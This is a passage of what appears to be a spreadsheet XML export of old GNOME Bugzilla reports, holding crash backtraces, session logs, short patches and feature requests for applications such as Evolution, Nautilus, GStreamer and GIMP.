#16 0x40225d76 in gtk_widget_destroy (widget=0x8091630) at gtkwidget.c:1388
#17 0x805373c in destroy_dialog (w=0x8091630 event=0x80a03e0 data=0x8091630)
    at splash.c:47
#18 0x401c8e29 in gtk_marshal_BOOL__POINTER (object=0x8091630 
    func=0x8053730  func_data=0x8091630 args=0xbffff630)
    at gtkmarshal.c:28
#19 0x401f69ed in gtk_handlers_run (handlers=0x8070000 signal=0xbffff5ec 
    object=0x8091630 params=0xbffff630 after=0) at gtksignal.c:1917
#20 0x401f5e32 in gtk_signal_real_emit (object=0x8091630 signal_id=27 
    params=0xbffff630) at gtksignal.c:1477
#21 0x401f3f35 in gtk_signal_emit (object=0x8091630 signal_id=27)
    at gtksignal.c:552
#22 0x4022934c in gtk_widget_event (widget=0x8091630 event=0x80a03e0)
    at gtkwidget.c:2860
#23 0x401c8d82 in gtk_propagate_event (widget=0x8097ab0 event=0x80a03e0)
    at gtkmain.c:1313
#24 0x401c7fda in gtk_main_do_event (event=0x80a03e0) at gtkmain.c:770
#25 0x4027256b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff9b4 user_data=0x0) at gdkevents.c:2129
#26 0x403bd1b6 in g_main_dispatch (dispatch_time=0xbffff9b4) at gmain.c:656
#27 0x403bd781 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x403bd921 in g_main_run (loop=0x8095058) at gmain.c:935
#29 0x401c7919 in gtk_main () at gtkmain.c:476
#30 0x80502d8 in main (argc=1 argv=0xbffffa64) at main.c:181
#0  0x405298e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405881ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x400850f1 in gnome_segv_handle (signum=11) at gnome-init.c:655
estatus = 1075614301
signum = -512
in_segv = 1
pid = 0
#3  0x404b6c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x403be39d in g_free (mem=0x6e756f73) at gmem.c:411
mem = 0xfffffe00
#5  0x80537ae in free_list (list=0x809cf98 udata=0x0) at splash.c:62
list = (GSList *) 0xfffffe00
#6  0x403c6529 in g_slist_foreach (list=0x808a8c8 func=0x80537a0  
    user_data=0x0) at gslist.c:487
list = (GSList *) 0x6e756f6b
user_data = 0x0
#7  0x80537f4 in splash_cleanup (o=0x8091630 data=0x0) at splash.c:70
No locals.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:02 -------
This bug was previously known as bug 16424 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=16424
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (pjones@redhat.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>pjones</t>
  </si>
  <si>
    <t>GNOME-UTILS-54393</t>
  </si>
  <si>
    <t>gdict</t>
  </si>
  <si>
    <t>gdict -a fails when net is down or proxy must be used</t>
  </si>
  <si>
    <t>If I run `gdict -a' before dialing in gdict simply
fails to run.  No window at all comes up.
I think this is unfriendly.
At least an error dialog should appear.
Best would be if the gdict application came up
and I only saw an error if I tried to actually
look something up.  (That is the connection to
the server should be made lazily)</t>
  </si>
  <si>
    <t>TOTEM-300510</t>
  </si>
  <si>
    <t>Browser plugin (obsolete)</t>
  </si>
  <si>
    <t>resolve relative urls</t>
  </si>
  <si>
    <t>Sometimes the src and href values given to the plugin are relative URLs. They
need to be resolved against the document URL in order to make sense.</t>
  </si>
  <si>
    <t>GNUCASH-335103</t>
  </si>
  <si>
    <t>Register</t>
  </si>
  <si>
    <t>Transfering money gives 0 in one account (non default currencies)</t>
  </si>
  <si>
    <t>I have the following setup.
Default currency : AUD (Australian Dollars)
Asset:Investment:Broker:Citi:Cash     
           Type Bank Currency SEK (Swedish)
Equity:Opening Balance
           Type Equity Currency AUD (Australian)
Running GnuCash version 1.9.2 r13665
What I do is the following:
1) Opening Cash account
2) Create a debit with 10000 and description Transfere Japanese Money
3) Credit the Equity:Opening Balance account with 10000
4) Register this transaction
5) Check the Opening Balance account and you will find the transaction there but all is NULL
Possible related to Bug #139651</t>
  </si>
  <si>
    <t>cedayiv</t>
  </si>
  <si>
    <t>bengt</t>
  </si>
  <si>
    <t>EVINCE-461996</t>
  </si>
  <si>
    <t>memory leak in ev-window.c</t>
  </si>
  <si>
    <t>memory leak in ev-window.c.</t>
  </si>
  <si>
    <t>GIMP-126941</t>
  </si>
  <si>
    <t>Info window doesn't rise to top if already open</t>
  </si>
  <si>
    <t>With an image open do View-&gt;Info Window.  Don't close the Info Window. 
Now click on the image to give it focus and do View-&gt;Info Window again. 
The Info Window doesn't raise above the image.
 Shouldn't it come to the top and receive focus?</t>
  </si>
  <si>
    <t>eric_wmaker</t>
  </si>
  <si>
    <t>EVOLUTION-218373</t>
  </si>
  <si>
    <t>column list shown is not correct one initially</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.0.99
Synopsis: column list shown is not correct one initially
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Description of Problem:
when a folder is clicked on initially the columns are shown in their
default locations and the default columns are shown.  Then quickly the
proper ones are shown and in proper order.  On fast computers this is
not seen but the fact it happens means something isn't programmed in
the correct order.  On slower CPUs especially when a folder is remote
such as an IMAP the delay can be up to 5 seconds and it looks really
nasty for columsn to change this quickly.
Steps to reproduce the problem:
1. click on a mailbox
2. observe the columsn shown
3. observe them change to what they should be.
Actual Results:
Expected Results:
How often does this happen? 
always
Additional Information:
Although it's not a bug it is a logical problem.  The code shouldn't
draw the wrong order only to redo it in the proper order.  It's not
efficient and wastes CPU cycles.
Unknown reporter: landb@mail.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>landb</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-317600</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME</t>
  </si>
  <si>
    <t>application/xhtml+xml icon is missing</t>
  </si>
  <si>
    <t>Please describe the problem:
title says all
Steps to reproduce:
1. create a *.xhtml file
Actual results:
the gnome default icon is being displayed
Expected results:
a *.xhtml specific icon should be displayed
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>GLIB-525674</t>
  </si>
  <si>
    <t>A typo in gmarkup.c.</t>
  </si>
  <si>
    <t>Index: glib/gmarkup.c
===================================================================
--- glib/gmarkup.c      (revision 6807)
+++ glib/gmarkup.c      (working copy)
@@ -18987 +18987 @@ g_markup_parse_context_get_element (GMar
  *
  * Returns: the element stack which must not be modified
  *
- * Since 2.16
+ * Since: 2.16
  **/
 G_CONST_RETURN GSList *
 g_markup_parse_context_get_element_stack (GMarkupParseContext *context)</t>
  </si>
  <si>
    <t>GTK+-355701</t>
  </si>
  <si>
    <t>crash in Drivel Journal Editor: Using the bleeding-edge ...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Using the bleeding-edge Ubuntu Edgy-Eft after feature freeze.  I had typed sudo make install in an xterm and the password prompt had appeared.  I ignored this and clicked the already open Drivel window on the same desktop.  I made a drag selection going left and upward to select 4 lines of html.  Drivel hung during the mouse drag selection. Not sure if it relates but I'm running Xgl/Compiz and am expecting stability issues.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.0 2006-09-04 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 51511296 vsize: 0 resident: 51511296 share: 0 rss: 7151616 rss_rlim: 0
CPU usage: start_time: 1158119108 rtime: 0 utime: 168 stime: 0 cutime:155 cstime: 0 timeout: 13 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/drivel'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1230264656 (LWP 28657)]
[New Thread -1231864928 (LWP 28660)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb6fb730b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7ec81b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xffffe410 in __kernel_vsyscall ()
#5  0xb6e9f760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
#6  0xb6ea0ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
#7  0xb72bb1a2 in g_logv () from /usr/lib/libglib-2.0.so.0
#8  0xb72bb1d9 in g_log () from /usr/lib/libglib-2.0.so.0
#9  0xb72bb256 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
#10 0xb784772b in gtk_text_view_new_with_buffer ()
   from /usr/lib/libgtk-x11-2.0.so.0
#11 0xb7847a2f in gtk_text_view_new_with_buffer ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0xb7cc58a8 in gtk_source_view_get_show_line_numbers ()
   from /usr/lib/libgtksourceview-1.0.so.0
#13 0xb77879f0 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0xb7370059 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#15 0xb737183b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0xb7382293 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#17 0xb7382f2f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#18 0xb7383329 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#19 0xb789b1e8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0xb7780de3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#21 0xb7781fe7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb760a8aa in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#23 0xb72b2872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#24 0xb72b584f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#25 0xb72b5bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#26 0xb78b3059 in gtk_clipboard_wait_for_contents ()
   from /usr/lib/libgtk-x11-2.0.so.0
#27 0xb78b3389 in gtk_clipboard_wait_is_text_available ()
   from /usr/lib/libgtk-x11-2.0.so.0
#28 0x0806a728 in journal_prop_new ()
#29 0x0806a7ae in journal_prop_new ()
#30 0xb77879f0 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#31 0xb737183b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#32 0xb7381c43 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#33 0xb7382f2f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#34 0xb7383329 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#35 0xb789b1e8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#36 0xb7780de3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#37 0xb7781fe7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#38 0xb760a8aa in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#39 0xb72b2872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#40 0xb72b584f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#41 0xb72b5bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#42 0xb7782464 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#43 0x0807554b in main ()
Thread 2 (Thread -1231864928 (LWP 28660)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6fb3816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7295b02 in g_async_queue_sort () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7295ea5 in g_async_queue_pop () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x0807884d in net_start_thread ()
No symbol table info available.
#5  0xb72d041f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6fb0504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb6f4350e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1230264656 (LWP 28657)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6fb730b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7ec81b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb6e9f760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
No locals.
#6  0xb6ea0ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
No locals.
#7  0xb72bb1a2 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb72bb1d9 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb72bb256 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb784772b in gtk_text_view_new_with_buffer ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0xb7847a2f in gtk_text_view_new_with_buffer ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0xb7cc58a8 in gtk_source_view_get_show_line_numbers ()
   from /usr/lib/libgtksourceview-1.0.so.0
No symbol table info available.
#13 0xb77879f0 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0xb7370059 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb737183b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb7382293 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0xb7382f2f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0xb7383329 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb789b1e8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0xb7780de3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0xb7781fe7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0xb760a8aa in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#23 0xb72b2872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#24 0xb72b584f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0xb72b5bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0xb78b3059 in gtk_clipboard_wait_for_contents ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0xb78b3389 in gtk_clipboard_wait_is_text_available ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x0806a728 in journal_prop_new ()
No symbol table info available.
#29 0x0806a7ae in journal_prop_new ()
No symbol table info available.
#30 0xb77879f0 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0xb737183b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb7381c43 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0xb7382f2f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0xb7383329 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb789b1e8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0xb7780de3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0xb7781fe7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0xb760a8aa in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#39 0xb72b2872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#40 0xb72b584f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#41 0xb72b5bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#42 0xb7782464 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#43 0x0807554b in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>i.r.williams</t>
  </si>
  <si>
    <t>EVOLUTION-499174</t>
  </si>
  <si>
    <t>Evolution does not display vEvents with RDATE</t>
  </si>
  <si>
    <t>Please describe the problem:
if a remote iCalendar file contains an event which contains and RDATE line the event is not displayed at all.
Steps to reproduce:
1. create an iCalendar file on a server which contains at least the following event:
BEGIN:VEVENT
UID:789846-4792384-423-abc
SUMMARY:RDATE test event
DTSTART:20071201T140000
DURATION:PT2H
LOCATION: test site
RDATE:20071202T140000
END:VEVENT
2. add the file to the list of calendars
3. wait
Actual results:
Nothing
Expected results:
The event should show up on 01-Dec and 02-Dec
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>stonjek</t>
  </si>
  <si>
    <t>GSTREAMER-499771</t>
  </si>
  <si>
    <t>using a fifo as filesink doesn't seem to work</t>
  </si>
  <si>
    <t>Using:
gst-launch  filesrc location=./testfile ! filesink location=./testfifo
with ./testfifo being a fifo is failing due to a tentative of seeking on./testfifo.
Since #343312 was closed filesink is reporting tentative of seeking on non seekable outputs. In the current case it properly reports the error.
However it seems that this still doesn't work. From reading gst_file_sink_event within gstfilesink.c I noticed that in case of GST_EVENT_NEWSEGMENT the filesink element would issue a seek.
In my case the problematic seek request tries to seek at offset 0 (from debug output of gst-inspect).
I think that it might be because a GST_EVENT_NEWSEGMENT is initially issued and filesink then tries to seek even if it's requested to seek at the current (initial) position.</t>
  </si>
  <si>
    <t>bouvigne</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-359589</t>
  </si>
  <si>
    <t>mouse movement wakes screensaver</t>
  </si>
  <si>
    <t>Forwarded from:
https://launchpad.net/distros/ubuntu/+source/gnome-screensaver/+bug/37139
Minor mouse movement (tram passing by walking around) stops gnome-screensaver.
With an optical mouse on an uneven surface it is sometimes difficult to click an icon to throttle gnome-screensaver without immidiately stoping screensaver again. Disabling screensaver is very annoying if sleeping or doing non-computer work near a desktop computer.
Suggestions:
- Add option to ignore mouse movement events
- Add a cli command to immidiatly go to the deepest DPMS sleep only waking from keyboard input</t>
  </si>
  <si>
    <t>TOTEM-351349</t>
  </si>
  <si>
    <t>[qtdemux] extract multiple redirect locations and required bitrates</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #350399 +++
+++ This bug was initially created as a clone of Bug #350343 +++
From:
http://events.apple.com.edgesuite.net/aug_2006/event/index.html
http://stream.qtv.apple.com/events/aug/wwdc_2006/m_wwdc_2006_350_ref.mov
should redirect us to:
http://stream.qtv.apple.com/events/aug/wwdc_2006/qt7required.mov
and
http://stream.qtv.apple.com/events/aug/wwdc_2006/wwdc_2006_1_350_ref.mov
The first MRL redirect (m_wwdc_2006_350_ref.mov) requires:
- knowledge of the supported quicktime version qtim atom
- knowledge of the connection speed for the data rate
The second one (wwdc_2006_1_350_ref.mov) isn't parseable by xine-lib either. I think it uses url atoms that we don't know how to parse...
connection-speed property support is needed in Totem for bacon_video_widget_set_connection_speed/bacon_video_widget_get_connection_speed</t>
  </si>
  <si>
    <t>NAUTILUS-442453</t>
  </si>
  <si>
    <t>crash in Home Folder:</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Distribution: Fedora Core release 6 (Zod)
Gnome Release: 2.18.0 2007-03-23 (Red Hat Inc)
BugBuddy Version: 2.16.0
System: Linux 2.6.20-1.2948.fc6 #1 SMP Fri Apr 27 18:53:15 EDT 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: Permissive
Accessibility: Disabled
Memory status: size: 131665920 vsize: 0 resident: 131665920 share: 0 rss: 22384640 rss_rlim: 0
CPU usage: start_time: 1180565523 rtime: 0 utime: 101 stime: 0 cutime:90 cstime: 0 timeout: 11 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1208526080 (LWP 7267)]
[New Thread -1211012208 (LWP 7283)]
(no debugging symbols found)
0x00905402 in __kernel_vsyscall ()
#0  0x00905402 in __kernel_vsyscall ()
#1  0x00ceccbb in waitpid () from /lib/libpthread.so.0
#2  0x064eecf6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x00000000 in ?? ()
#5  0x0812ed19 in nautilus_undo_transaction_unregister_object ()
#6  0x0812efb8 in nautilus_undo_transaction_unregister_object ()
#7  0x03d496fc in g_type_create_instance () from /lib/libgobject-2.0.so.0
#8  0x03d30f42 in g_object_set () from /lib/libgobject-2.0.so.0
#9  0x03d2eb9b in g_object_newv () from /lib/libgobject-2.0.so.0
#10 0x03d2f6fe in g_object_new_valist () from /lib/libgobject-2.0.so.0
#11 0x045331e8 in gtk_widget_new () from /usr/lib/libgtk-x11-2.0.so.0
#12 0x0812e7a5 in nautilus_undo_transaction_unregister_object ()
#13 0x080f203a in nautilus_directory_ref ()
#14 0x00a3aa4f in gnome_vfs_async_get_job_limit ()
   from /usr/lib/libgnomevfs-2.so.0
#15 0x00a3ae1e in gnome_vfs_async_get_job_limit ()
   from /usr/lib/libgnomevfs-2.so.0
#16 0x03caa6e1 in g_source_is_destroyed () from /lib/libglib-2.0.so.0
#17 0x03cac442 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
#18 0x03caf41f in g_main_context_check () from /lib/libglib-2.0.so.0
#19 0x03caf7c9 in g_main_loop_run () from /lib/libglib-2.0.so.0
#20 0x04411554 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#21 0x0807a390 in POA_Nautilus_MetafileMonitor__init ()
#22 0x00b87f2c in __libc_start_main () from /lib/libc.so.6
#23 0x08064bd1 in g_cclosure_marshal_VOID__ENUM ()
Thread 2 (Thread -1211012208 (LWP 7283)):
#0  0x00905402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00ce91a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00a3a6ac in gnome_vfs_async_get_job_limit ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0x00a3cbdc in gnome_vfs_job_get_count () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x00a5b3f3 in gnome_vfs_volume_to_dbus () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#5  0x00a5f48e in gnome_vfs_volume_to_dbus () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#6  0x00a3cc82 in gnome_vfs_job_get_count () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#7  0x00a3cf59 in gnome_vfs_job_get_count () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#8  0x00a3a1b1 in gnome_vfs_is_primary_thread ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#9  0x03ccbc68 in g_thread_pool_push () from /lib/libglib-2.0.so.0
No symbol table info available.
#10 0x03cca29f in g_thread_create_full () from /lib/libglib-2.0.so.0
No symbol table info available.
#11 0x00ce53db in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#12 0x00c3f26e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1208526080 (LWP 7267)):
#0  0x00905402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00ceccbb in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#2  0x064eecf6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
#5  0x0812ed19 in nautilus_undo_transaction_unregister_object ()
No symbol table info available.
#6  0x0812efb8 in nautilus_undo_transaction_unregister_object ()
No symbol table info available.
#7  0x03d496fc in g_type_create_instance () from /lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x03d30f42 in g_object_set () from /lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x03d2eb9b in g_object_newv () from /lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x03d2f6fe in g_object_new_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x045331e8 in gtk_widget_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0x0812e7a5 in nautilus_undo_transaction_unregister_object ()
No symbol table info available.
#13 0x080f203a in nautilus_directory_ref ()
No symbol table info available.
#14 0x00a3aa4f in gnome_vfs_async_get_job_limit ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#15 0x00a3ae1e in gnome_vfs_async_get_job_limit ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#16 0x03caa6e1 in g_source_is_destroyed () from /lib/libglib-2.0.so.0
No symbol table info available.
#17 0x03cac442 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
No symbol table info available.
#18 0x03caf41f in g_main_context_check () from /lib/libglib-2.0.so.0
No symbol table info available.
#19 0x03caf7c9 in g_main_loop_run () from /lib/libglib-2.0.so.0
No symbol table info available.
#20 0x04411554 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x0807a390 in POA_Nautilus_MetafileMonitor__init ()
No symbol table info available.
#22 0x00b87f2c in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#23 0x08064bd1 in g_cclosure_marshal_VOID__ENUM ()
No symbol table info available.
#0  0x00905402 in __kernel_vsyscall ()
----------- .xsession-errors ---------------------
Debug: Loading Beagle.Util.Conf+IndexingConfig from indexing.xml
Debug: Loading Beagle.Util.Conf+DaemonConfig from daemon.xml
Debug: Loading Beagle.Util.Conf+SearchingConfig from searching.xml
Error: Caught exception while trying to parse Kopete contact list:
System.Xml.XmlException: Document element did not appear. file:///home/marc/.kde/share/apps/kopete/contactlist.xml Line 1 position 1.
  at System.Xml.XmlTextReader.Read () [0x00000] 
  at System.Xml.XmlDocument.ReadNodeCore (System.Xml.XmlReader reader) [0x00000] 
  at System.Xml.XmlDocument.ReadNode (System.Xml.XmlReader reader) [0x00000] 
  at System.Xml.XmlDocument.Load (System.Xml.XmlReader xmlReader) [0x00000] 
  at System.Xml.XmlDocument.Load (System.String filename) [0x00000] 
  at Beagle.Util.KopeteBuddyListReader.Read () [0x00000] 
** (bug-buddy:7247): WARNING **: No s'ha pogut carregar la icona per a Obre la carpeta
** (bug-buddy:7285): WARNING **: No s'ha pogut carregar la icona per a Obre la carpeta
--------------------------------------------------</t>
  </si>
  <si>
    <t>woundorf</t>
  </si>
  <si>
    <t>LIBGNOME-KEYRING-339436</t>
  </si>
  <si>
    <t>A small typo in gnome_keyring_change_password_sync</t>
  </si>
  <si>
    <t>Please describe the problem:
a space is in the wrong spot making the function work incorrectly
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>jon.nettleton</t>
  </si>
  <si>
    <t>GTK+-343495</t>
  </si>
  <si>
    <t>gdk_win32_icon_to_pixbuf_libgtk_only does not handle B&amp;W only icons</t>
  </si>
  <si>
    <t>As noted by bug 309466:
For a b/w icon ii.hbmColor is NULL and GetDIBits fails.
ii.bhmMask is defined:- the upper half is the icon AND bitmask and the lower half is the icon XOR bitmask
Unfortunately comprehension has elluded me.
My hack is to interpret GetDIBits(... ii.hdmMask ...) as
  pixels[2]=bits[(x+y*w)*4]
  pixels[1]=bits[(x+y*w)*4]
  pixels[0]=bits[(x+y*w)*4]
  pixels[3]=255-(bits[(x+y*w)*4]^bits[(x+(y+h)*w)*4])
which at least resembles the desired cursor.</t>
  </si>
  <si>
    <t>GLIB-515892</t>
  </si>
  <si>
    <t>another compile error due to C99 constructs</t>
  </si>
  <si>
    <t>Patch against 2.15.5.</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-500846</t>
  </si>
  <si>
    <t>crash in Deskbar:</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.21.2 2007-11-14 (Ubuntu)
BugBuddy Version: 2.20.1
System: Linux 2.6.22-14-generic #1 SMP Sun Oct 14 23:05:12 GMT 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: Tango
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (19 sec old) ---------------------
Throttle level is 0
Starting gdesklets-daemon...
Connecting to daemon [###          ]
Connecting to daemon [ ###         ]
